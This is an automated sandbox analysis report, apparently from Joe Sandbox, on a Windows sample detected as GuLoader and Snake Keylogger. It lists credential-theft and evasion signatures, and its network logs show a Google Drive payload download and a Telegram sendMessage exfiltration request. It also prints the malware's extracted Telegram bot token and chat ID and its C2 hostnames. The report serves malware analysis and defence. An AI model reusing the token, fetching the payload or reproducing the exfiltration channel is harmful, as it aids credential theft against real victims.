Windows Analysis Report
Fa24c148.exe

Overview

General Information

Sample name: Fa24c148.exe
Analysis ID: 1543766
MD5: 7644ebbf786053ffaf95dbe86b7de5d4
SHA1: 5d563fb10f6d71049ae5f69fb6ccb9f2217ddf32
SHA256: 0b7ba80811d300aefe42de77b7b8fb2d5b6f9a8d4f2cf3d1213b6fead5efb59b

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8148338634:AAFvLNrhxaF7bMPzQMLbUnueRMJvDIi5kcU", "Chat_id": "7698865320", "Version": "4.4"}
Source: Fa24c148.exe ReversingLabs: Detection: 15%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E687A8 CryptUnprotectData, 4_2_35E687A8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E68EF1 CryptUnprotectData, 4_2_35E68EF1
Source: Fa24c148.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49739 version: TLS 1.0
Source: unknown HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.65:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004055FF
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_004060BA FindFirstFileW,FindClose, 0_2_004060BA
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_00402770 FindFirstFileW, 0_2_00402770
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_00402770 FindFirstFileW, 4_2_00402770
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_004055FF
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_004060BA FindFirstFileW,FindClose, 4_2_004060BA
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 0016F45Dh 4_2_0016F2C0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 0016F45Dh 4_2_0016F4AC
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 0016F45Dh 4_2_0016F52F
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 0016FC19h 4_2_0016F961
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35782C19h 4_2_35782968
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 357831E0h 4_2_35782DC8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 3578E0A9h 4_2_3578DE00
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 3578D7F9h 4_2_3578D550
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 357831E0h 4_2_3578310E
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 357831E0h 4_2_35782DB8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 3578DC51h 4_2_3578D9A8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 4_2_35780040
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 3578FAB9h 4_2_3578F810
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 3578D3A1h 4_2_3578D0F8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 3578CF49h 4_2_3578CCA0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 3578F209h 4_2_3578EF60
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35780D0Dh 4_2_35780B30
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35781697h 4_2_35780B30
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 3578EDB1h 4_2_3578EB08
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 3578F661h 4_2_3578F3B8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 3578E501h 4_2_3578E258
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 3578E959h 4_2_3578E6B0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E69280h 4_2_35E68FB0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E67EB5h 4_2_35E67B78
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6CCB6h 4_2_35E6C9E8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E618A1h 4_2_35E615F8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6ECA6h 4_2_35E6E9D8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E65E81h 4_2_35E65BD8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E61449h 4_2_35E611A0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6BA76h 4_2_35E6B7A8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E62E59h 4_2_35E62BB0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E65A29h 4_2_35E65780
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6FA56h 4_2_35E6F788
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6DA66h 4_2_35E6D798
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E60FF1h 4_2_35E60D48
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6E816h 4_2_35E6E548
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6C826h 4_2_35E6C558
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E62A01h 4_2_35E62758
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E679C9h 4_2_35E67720
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E655D1h 4_2_35E65328
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E625A9h 4_2_35E62300
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6D5D6h 4_2_35E6D308
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6B5E6h 4_2_35E6B318
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E60B99h 4_2_35E608F0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6F5C6h 4_2_35E6F2F8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6C396h 4_2_35E6C0C8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E67571h 4_2_35E672C8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E65179h 4_2_35E64ED0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E62151h 4_2_35E61EA8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6E386h 4_2_35E6E0B8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then mov esp, ebp 4_2_35E6B081
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E66733h 4_2_35E66488
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E60741h 4_2_35E60498
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E63709h 4_2_35E63460
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6F136h 4_2_35E6EE68
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E67119h 4_2_35E66E70
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6D146h 4_2_35E6CE78
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E64D21h 4_2_35E64A78
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E602E9h 4_2_35E60040
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E61CF9h 4_2_35E61A50
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E648C9h 4_2_35E64620
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6DEF6h 4_2_35E6DC28
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E662D9h 4_2_35E66030
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E6BF06h 4_2_35E6BC38
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E632B1h 4_2_35E63008
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 35E66CC1h 4_2_35E66A18
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B6970h 4_2_367B6678
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B4746h 4_2_367B4478
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BD768h 4_2_367BD470
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BAC60h 4_2_367BA968
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B0C2Eh 4_2_367B0960
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B8158h 4_2_367B7E60
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B3E26h 4_2_367B3B58
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BEF50h 4_2_367BEC58
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BC448h 4_2_367BC150
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B5E16h 4_2_367B5B48
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B9940h 4_2_367B9648
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B030Eh 4_2_367B0040
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B6E38h 4_2_367B6B40
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B3506h 4_2_367B3238
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BDC30h 4_2_367BD938
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BB128h 4_2_367BAE30
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B54F6h 4_2_367B5228
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B8620h 4_2_367B8328
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BF418h 4_2_367BF120
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B2BE6h 4_2_367B2918
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BC910h 4_2_367BC618
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B19DEh 4_2_367B1710
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B9E08h 4_2_367B9B10
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B4BD7h 4_2_367B4908
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B7300h 4_2_367B7008
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BE0F8h 4_2_367BDE00
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B22C6h 4_2_367B1FF8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BB5F0h 4_2_367BB2F8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B10BEh 4_2_367B0DF0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B8AE8h 4_2_367B87F0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B42B6h 4_2_367B3FE8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BF8E0h 4_2_367BF5E8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BCDD8h 4_2_367BCAE0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B6347h 4_2_367B5FD8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BA2D0h 4_2_367B9FD8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B079Eh 4_2_367B04D0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B77C8h 4_2_367B74D0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BE5C0h 4_2_367BE2C8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BBAB8h 4_2_367BB7C0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B5986h 4_2_367B56B8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B8FB0h 4_2_367B8CB8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BFDA8h 4_2_367BFAB0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B3076h 4_2_367B2DA8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BD2A0h 4_2_367BCFA8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B1E47h 4_2_367B1BA0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BA798h 4_2_367BA4A0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B5066h 4_2_367B4D98
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B7C90h 4_2_367B7998
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BEA88h 4_2_367BE790
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B2756h 4_2_367B2488
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367BBF80h 4_2_367BBC88
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B154Eh 4_2_367B1280
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367B9478h 4_2_367B9180
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367F1FE8h 4_2_367F1CF0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367F0CC8h 4_2_367F09D0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367F0338h 4_2_367F0040
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367F1B20h 4_2_367F1828
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367F1190h 4_2_367F0E98
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367F1658h 4_2_367F1360
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then jmp 367F0801h 4_2_367F0508
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_36833E70
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_36833E60
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_36830A10
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_368308DE
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_36830960

Networking

Source: unknown DNS query: name: api.telegram.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%2028/10/2024%20/%2022:44:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 132.226.247.73 132.226.247.73
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49740 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 142.250.185.206:443
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49739 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 28 Oct 2024 11:22:50 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: Fa24c148.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20a
Source: Fa24c148.exe, 00000004.00000003.2078462414.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F6F000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Fa24c148.exe, 00000004.00000002.2951440746.0000000033782000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
